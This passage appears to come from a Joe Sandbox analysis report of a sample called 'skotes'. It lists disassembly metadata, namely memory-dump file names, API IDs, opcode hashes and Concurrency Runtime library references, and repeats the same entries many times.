                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2568206803-0
                                                                                                                                                                                                                                                                • Opcode ID: 5424cd41ad20c545492153f12f4e15e5e124b202d7d81a34c98dda1ebc6c9ac9
                                                                                                                                                                                                                                                                • Instruction ID: 6ddeb93d36bb98a46a69f4867b23ec83230f349cb69a528618e36496973be0fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5424cd41ad20c545492153f12f4e15e5e124b202d7d81a34c98dda1ebc6c9ac9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D318B71A002158FDB15DFA8C9416EEB7F8AF09310B64406EE845E7392DBB49E02CBA1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 00ACD344
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00ACD367
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00ACD370
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00ACD3A8
                                                                                                                                                                                                                                                                • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00ACD3B3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4212520697-0
                                                                                                                                                                                                                                                                • Opcode ID: e6fb1dca286e6e84497b279daf5fecf6f4f2dda7411b5c3d56072c76a8283081
                                                                                                                                                                                                                                                                • Instruction ID: aa53edcbf8331fcd41b22d25818a77e9d8919c7005fc29d8f989bc3b512178d1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6fb1dca286e6e84497b279daf5fecf6f4f2dda7411b5c3d56072c76a8283081
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D318035700210AFCB05EB54C985FADB7B5AF88310F1641ADE80A9F392DB70ED41CB92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _SpinWait.LIBCONCRT ref: 00AC86EE
                                                                                                                                                                                                                                                                  • Part of subcall function 00ABEAD0: _SpinWait.LIBCONCRT ref: 00ABEAE8
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00AC8702
                                                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00AC8734
                                                                                                                                                                                                                                                                • List.LIBCMT ref: 00AC87B7
                                                                                                                                                                                                                                                                • List.LIBCMT ref: 00AC87C6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                • Opcode ID: 060ccfa9b62ba8dccb58d5afee74c60230937b44a3f2b0325e970acc1c60cbdd
                                                                                                                                                                                                                                                                • Instruction ID: f039d2ed2accca6312df9a83204189538a4eadbd4c804b17f0f37e48f9b8cba4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 060ccfa9b62ba8dccb58d5afee74c60230937b44a3f2b0325e970acc1c60cbdd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F316836905255DFCB14EFA4CA81AEDBBB1BF04718F2A406ED40177652EF396D14CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AD18A4
                                                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00AD18EB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pContext
                                                                                                                                                                                                                                                                • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                                                • Opcode ID: caa25f5dcbac33669fd647a07b17f4970712d9db34e9c96044a05401b923a30e
                                                                                                                                                                                                                                                                • Instruction ID: 9333dbc5851cd87a7b1ec4d82d2a950ae88ee6d77d11ee435de6a37705ee9738
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: caa25f5dcbac33669fd647a07b17f4970712d9db34e9c96044a05401b923a30e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7212735B00615BBCB14EBA8D895EBCB3B9BF80334B04016BE503873D1DBA4EC42DA90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • List.LIBCONCRT ref: 00ACAEEA
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00ACAF0F
                                                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00ACAF4E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
